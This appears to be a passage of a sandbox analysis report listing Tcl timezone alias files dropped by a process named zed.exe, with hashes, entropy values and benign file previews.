                                                                                                                                                                                                                                            Entropy (8bit):5.113680059406992
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y71RHAIgp1aAN/krp4901Yn:JByMY4pltw+90q
                                                                                                                                                                                                                                            MD5:AAD8EF3067E97785D4052B80F5C4ACE1
                                                                                                                                                                                                                                            SHA1:3EF0A06FCC41119F4A60A32CED0E5A1E0E8B4300
                                                                                                                                                                                                                                            SHA-256:D159140114A13C69F073CFE9AD0B67D713E8811CBFF773A3D1681FC38EA0E699
                                                                                                                                                                                                                                            SHA-512:A8774ADF6818D85476A6C147A45E55B338F413CD9B61BF9FDB0CB7A335C0CE8F8C6D1970783FEFECC2CE18388DF91304CB295BD4DFD29FB538D74F6A414A441D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:SystemV/EST5EDT) $TZData(:America/New_York)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.9733028894475195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3yc6e8SHAIgOb6eKAN/kQmrheo:JByMdniinbtRTo
                                                                                                                                                                                                                                            MD5:458061B3F3C8F06C61B5726393A26BA2
                                                                                                                                                                                                                                            SHA1:E894F5615654D1110C9964B8F6A54C048442D8EB
                                                                                                                                                                                                                                            SHA-256:BF62C8650BBA258000F62F16B0C7CBB66F4FD63F8CFDAF54273BB88A02A6C8D6
                                                                                                                                                                                                                                            SHA-512:6A161A7AE44CBF8CE4C704C94456A5B714AAF2A3FAF30731254C9FE056F9DDF207119D516CC6A4C44AE76EC078F5C59F5EC6DD6701FAA3A36F061AF3953B7C7D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:SystemV/HST10) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.999038624718282
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/kRgFfh4IAcGEuto:SlSNJB9vsM3y7OBHAIgpONYyHN/kch4y
                                                                                                                                                                                                                                            MD5:B06AB4998A57446FC4D5A5B986BCA0A9
                                                                                                                                                                                                                                            SHA1:5E4A28466383CBAB2067B9B6D22882CF6D83C3FB
                                                                                                                                                                                                                                            SHA-256:FEBE49FAE260E5595B6F1B21A0A3458D8A50ACA72F4551BF10C1EDB2758E0304
                                                                                                                                                                                                                                            SHA-512:9E44174C4E348E1B768039585BA6393FD001B606E111092EEC57C75210A1E87BF3C72728321945D584CA60D4C848D88EB8B2F82CB88F38F90224A43FDCFEA9AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:SystemV/MST7) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.956231227702093
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/kRMMFfh4IAcGE6RB:SlSNJB9vsM3y7+SPHAIgp+ON/kD490+B
                                                                                                                                                                                                                                            MD5:5D3C1ADB8AC4EAC9E9A31734CD6884BD
                                                                                                                                                                                                                                            SHA1:535B024EA088B9B192BE4206CBDD56BC5B163762
                                                                                                                                                                                                                                            SHA-256:64556A7B20E425C79375C2A7CCF72B2B5223A7DE4FF4C99A5C039DB3456C63F6
                                                                                                                                                                                                                                            SHA-512:FB799A42880613752AD6010D7B4E97ACCF7F6AE281D9A37057F6423AEF2607B608DB2AC52176F1653D8B2D086223C9658B101E73125F0FF7D6D9E8CD876EEC53
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:SystemV/MST7MDT) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.831981174214766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQGuQTWLM4YkovXHAIgObTuQTWLovFvHRL/kRQB5nv:SlSNJB9vsM3yciQyLM4YJHAIgObiQyLQ
                                                                                                                                                                                                                                            MD5:B568B46A0207800D9C022BAB1E48709B
                                                                                                                                                                                                                                            SHA1:71CE3F0E75E440D5BBA219BCBB92AF9C1F5A7466
                                                                                                                                                                                                                                            SHA-256:0B8227AFC94082C985E8E125DF83E5EFADE7CD9CA399800D7B8E8B2BEAE22C7D
                                                                                                                                                                                                                                            SHA-512:5067AAD0CD02EBDECA6980F9C7CCC80D076C34D6463C5B6B19B678D76B5E69C1C3639D046F56FE9D6255CBEA49189EDD735F66AD9EE2CB0389BE020E7ED3AD50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pitcairn)]} {.. LoadTimeZoneFile Pacific/Pitcairn..}..set TZData(:SystemV/PST8) $TZData(:Pacific/Pitcairn)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):5.003766957083974
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7DvPHAIgp5N/kQ1p490Dy:JByMY8p5th090W
                                                                                                                                                                                                                                            MD5:7E587175CA0F938C47FA920D787C57BD
                                                                                                                                                                                                                                            SHA1:C3F7D8576C0AC74D6B70F4363EE2C174FADC70B0
                                                                                                                                                                                                                                            SHA-256:D51D9549835E9C058F836C8952932CB53C10F7F194CD87452E9B13494D1C54C9
                                                                                                                                                                                                                                            SHA-512:4460686AAA470F07A6DB1F8957FA4DB600E116273497F46E8A2D3FDECF622122DF753556B78C39FA2ADFDB2AF3C3ABB3C330ADA79B35C6A3CD8C498A0319CEE6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:SystemV/PST8PDT) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.9524733332469095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQG5hB5WXHAIgObT5hByY6RL/kRKlUDH5hBpvn:SlSNJB9vsM3ycT2HAIgOboN/kNv
                                                                                                                                                                                                                                            MD5:5970A466367825D72D9672293FCD4656
                                                                                                                                                                                                                                            SHA1:1A736D61A6797295EEC8C094AED432171E98578E
                                                                                                                                                                                                                                            SHA-256:55710EFDED5B5830B2F3A2A072037C5251E1766F318707ED7CD5EB03037FED43
                                                                                                                                                                                                                                            SHA-512:1F2A1B2A7D0A3E410652546C174D9EC18C91C9327F11C384A0AA1EB12D7EFE85C4D53CA3C2A6C347C0068A4CE92A3138EB17232B0DEC88D52465C5DEDEEE6827
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Gambier)]} {.. LoadTimeZoneFile Pacific/Gambier..}..set TZData(:SystemV/YST9) $TZData(:Pacific/Gambier)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.994125896811442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7/9EtDSHAIgp/9Ef6N/kB490/9E9v:JByMY/947p/9XtN90/9s
                                                                                                                                                                                                                                            MD5:560B18DFB138DAF821CFDAE017B94473
                                                                                                                                                                                                                                            SHA1:0BB0312C742CC0097DF033656AE3D10723035C30
                                                                                                                                                                                                                                            SHA-256:DA20018DE301F879E4F026405C69FA0370EB10184FE1C84A4F1504079D5DAFA1
                                                                                                                                                                                                                                            SHA-512:B1D4EAD5F549E319DAD55EE67DAFD732E755164748C08633AA8F07C280B2CF617380D6F886304142D0E4D50026E63678DACFBE2DC809F780BA4CFF35A90DE906
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:SystemV/YST9YDT) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.9295990493611495
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/jCl1yQaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/SymKv
                                                                                                                                                                                                                                            MD5:1FABF2DFD4BFD0184AE22ED76F7569E5
                                                                                                                                                                                                                                            SHA1:5859266B26357B4FCADD7EC65847667631E303EB
                                                                                                                                                                                                                                            SHA-256:8471A5575B9D9E47412D851A18A26C4405480540AABC8DAED5F81BE0C714C07C
                                                                                                                                                                                                                                            SHA-512:1DCBECEF6D1F923E6C9CEA70CB10F1FF4E453265966AA88FBC8739E93EF40F8A16AAD85AF4ECC5CC1E52F22F49E5D3F4EE01A97DE2302FC4FBC063FE814F3851
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Turkey) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iGMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iP8RX
                                                                                                                                                                                                                                            MD5:DA060D2F397C978E0842631B4EC73376
                                                                                                                                                                                                                                            SHA1:649BC85430B04662BE079C0AAD43DF5D5D499D28
                                                                                                                                                                                                                                            SHA-256:356A9BB6F831971C295CF4DCE0F0CDC9EDF94FD686CA3D3195E5F031A0B67CBA
                                                                                                                                                                                                                                            SHA-512:3359BFC6F0837D2DA9D72DA8053773CE0C1A1B1A47C33163BF38965E2104F57BC147F9EEC228A3591B75BF1BA93285AB83E8427E8E2E697AB18501DC017B6E6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.911775112130145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/VXEtDovXHAIg20/VXEfovRL/iOGl0IAcGE/VXEN:SlSWB9vsM3y7/9EtDSHAIgp/9Ef6N/i4
                                                                                                                                                                                                                                            MD5:4379C0BF618649AA07CC4BDAC75F62EF
                                                                                                                                                                                                                                            SHA1:7813B54BF2BD0C40A39CA9A29CC50C6D034880A3
                                                                                                                                                                                                                                            SHA-256:CED56F09D68BE00555219594C7B2F3E7EFE8323201FB3E2AA0E1FA9A6467D5AF
                                                                                                                                                                                                                                            SHA-512:AC822061F5C9743120A66E11C02B199253A40460A87F78DC154B0BDD91E410EDDA581E889F5D2A74670939034F39A7F6C7E814E038A1371DAB71EF79A8911AE7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:US/Alaska) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.8886795125313585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/iObMEIB/4IAcGE/y2:SlSWB9vsM3y7/yrHAIgp/yH0AN/itE8h
                                                                                                                                                                                                                                            MD5:AB14CF1840CBDA2B326660DBD51273B4
                                                                                                                                                                                                                                            SHA1:78144B3A2C75568307E4E86AE3B01EA7F541B011
                                                                                                                                                                                                                                            SHA-256:A4F1398CF84D0AE09BF19288770756622D1710CCBFBFE79E0D3239497731287D
                                                                                                                                                                                                                                            SHA-512:557A3ED9D1401E76291DC41524A1FD04AFF0829CEF66E103CEF9D10CD751F04FDEB6B7C0490302C71297F53AA8DC42930649AD274215D5DF068BCDE837E73756
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:US/Aleutian) $TZData(:America/Adak)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.9334626069754455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/iQMfQfBx+IAcGEB:SlSWB9vsM3y7OBHAIgpONYyHN/iZfQfl
                                                                                                                                                                                                                                            MD5:30ED80335BE37C7CBA672C33FDE23490
                                                                                                                                                                                                                                            SHA1:B627E86F023FE02A5590FE8D55FF41946BE6D24B
                                                                                                                                                                                                                                            SHA-256:9503403F231BA33415A5F2F0FDD3771CE7FF78534CE83C16A8DB5BC333B4AD8A
                                                                                                                                                                                                                                            SHA-512:C1352612EC0B4FF2F6F279CDB6008D7E9DA7F94F0009EFD959AD3092393150ECA83A09E72C724E1A4BFC3A057B9218D54A87FFA1102E2D9BF058B78AC0A0B1AB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:US/Arizona) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.90255068822036
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx096yXHAIg20961yHRL/ibXgox/h4IAcGE967:SlSWB9vsM3y796SHAIgp9616N/iB490+
                                                                                                                                                                                                                                            MD5:7770A6B85B2FE73BCCE9D803E0200F23
                                                                                                                                                                                                                                            SHA1:784AD1082FF1569961C2AC44F6D6F7605FBBE766
                                                                                                                                                                                                                                            SHA-256:B6AC9FAE0AB69D58ECFD6B9A84F3C6D3E1A594E40CEEC94E2A0A7855781E173A
                                                                                                                                                                                                                                            SHA-512:EEE79D37D77E6B80B91E8F30CE48B107371F6A58F0C91785E3C74EF210AE1011D0EB913113F1873BE6099B0BE1260410F0C74650446CB377F8FDB5505A44F266
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:US/Central) $TZData(:America/Chicago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):228
                                                                                                                                                                                                                                            Entropy (8bit):4.7645631776966715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/i3E0903GK8:MByMY3GK7Kp3GKnti3t903GK8
                                                                                                                                                                                                                                            MD5:96828B6BA17CA96723794F4B3744B494
                                                                                                                                                                                                                                            SHA1:C3A824A925AEFE2A13A0E65548078D9842C2C7D7
                                                                                                                                                                                                                                            SHA-256:5D86F8D36598516FB2342A18A87DB2701BABD265B0671CC9321C48DB22C7ECA5
                                                                                                                                                                                                                                            SHA-512:2A27A455787DEAC3EC78A2784FB989DAB178E9D6DD7721CD3F5D3337231A3C651994B964D6CE040B7858E0127D7F70C0C48CB0D553D5B725B649C828288224B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:US/East-Indiana) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):5.0345860115708785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wAy0vfXHAIg20wAyGWARL/i37oxp4IAcGEwAy0yn:SlSWB9vsM3y71RHAIgp1aAN/i37oxp4P
                                                                                                                                                                                                                                            MD5:375DB249106C5D351CA0E84848835EDB
                                                                                                                                                                                                                                            SHA1:ECC5C0C9DA68773B94C9013F4F1A8800D511CC4C
                                                                                                                                                                                                                                            SHA-256:2FFCAD8CBEF5ECDC74DB3EE773E4B18ABC8EFA9C09C4EA8F3A45A08BADAF91A9
                                                                                                                                                                                                                                            SHA-512:21550743BF4E1A79754F76AB201F0EB6BA6B265F43855901640054316A4A32A5D01D266B2441E4A6415720715A2ABD367D82E3D40949A7A66BE9F8366E47A8DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:US/Eastern) $TZData(:America/New_York)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.88075715646936
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG2fWGYFeyXHAIgObT2fWKARL/ioMN75nUDH2fWWv:SlSWB9vsM3yc6e8SHAIgOb6eKAN/ioER
                                                                                                                                                                                                                                            MD5:C0475756CFEC302F737967468804846E
                                                                                                                                                                                                                                            SHA1:85C13CA0A908C69B8BBB6040FC502AFF96B8F8C7
                                                                                                                                                                                                                                            SHA-256:529BB43EFDA6C1584FEAEA789B590CEF1397E33457AB3845F3101B1FC126E0FB
                                                                                                                                                                                                                                            SHA-512:D3FF374443344E8438D50803872E8A8EA077B2299B38C1BD155386B4D2C6008BBD0C0B0B26DE9680812D4AFC9A187B644BDCCB04C23880337228BCEC06D5D61B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:US/Hawaii) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                                                            Entropy (8bit):4.87340978435866
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/iGIfh4903GKT:MByMY3GKDp3GKItiBfh4903GKT
                                                                                                                                                                                                                                            MD5:00AAFD60A0B1146274981FAB6336AFD9
                                                                                                                                                                                                                                            SHA1:20AD47ED52874202585C90FE362663F060E064D3
                                                                                                                                                                                                                                            SHA-256:5827B6A6D50CF0FB75D6BA6E36282591AD25E1F0BE636DCFC5D09BDA29A107FD
                                                                                                                                                                                                                                            SHA-512:61113AB72B7D671D7B429106709E73DB57D5B8A382680BA37A54126C7F54BC2D6B47A2584177CE6B434793546DA7EB9B8B7DF9163816DBFC67C83D9930D6A158
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.83459089067994
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06FQGFfXHAIg206FQJARL/iHaMCELMr4IAcGE6FQB:SlSWB9vsM3y74PFPHAIgp4KAN/iHaMHs
                                                                                                                                                                                                                                            MD5:D955A5A943B203DC4B87A91ED196B82A
                                                                                                                                                                                                                                            SHA1:C7ACC48AB2033C372C60C741F68B12FFAEA147DE
                                                                                                                                                                                                                                            SHA-256:B4E4269C4FEBFEFF26750B297A590226C0A6872519A6BFDE36F6DC3F6F756349
                                                                                                                                                                                                                                            SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.892777905787396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                                                                                                                            MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                                                                                                                            SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                                                                                                                            SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                                                                                                                            SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.932311644026309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                                                                                                                            MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                                                                                                                            SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                                                                                                                            SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                                                                                                                            SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.838968615416201
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                                                                                                                            MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                                                                                                                            SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                                                                                                                            SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                                                                                                                            SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                                                                                                                            Malicious:false
